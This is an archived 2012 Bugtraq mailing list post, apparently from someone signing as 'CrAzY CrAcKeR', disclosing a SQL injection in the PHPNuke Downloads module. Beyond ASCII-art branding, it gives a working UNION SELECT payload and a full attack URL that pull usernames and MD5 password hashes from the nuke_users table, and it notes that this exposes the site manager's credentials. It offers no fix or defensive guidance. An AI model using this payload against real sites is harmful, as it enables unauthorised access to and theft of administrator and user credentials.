| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201204051958.q35Jww95028887@sf01web2.securityfocus.com>
Date: Thu, 5 Apr 2012 19:58:58 GMT
From: CrAzY_CrAcKeR@...1-ss-2-lb.cnet.com
To: bugtraq@...urityfocus.com
Subject: PHPNuke Module's Name Download SQL Injection Vulnerabilities
##################################################################
##################################################################
#
# _ _ _
# .-" "-.
# / \
# | |
# |, .-. .-. ,|
# | )(_o/ \o_)( |
# |/ /\ \|
# (@_ (_ ^^ _)
# _ ) \_______\__|IIIIII|__/_______________________________
# (_)@8@8{}<________|-\IIIIII/-|________________________________>
# )_/ \ /
# (@
#
# +-+-+-+-+-+-+-+-+-+-+
# --+CrAzY CrAcKeR+--
# +-+-+-+-+-+-+-+-+-+-+
#
#
##################################################################
##################################################################
# Example:-
#
# [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(sql)
#
# [-] Injection code.... ( -1+union+select+username,1,user_password,user_id+from+nuke_users )
#
# [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1+union+select+username,1,user_password,user_id+from+nuke_users
#
# [-] you see now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend A7eb Alwrd
####################################################################
Powered by blists - more mailing lists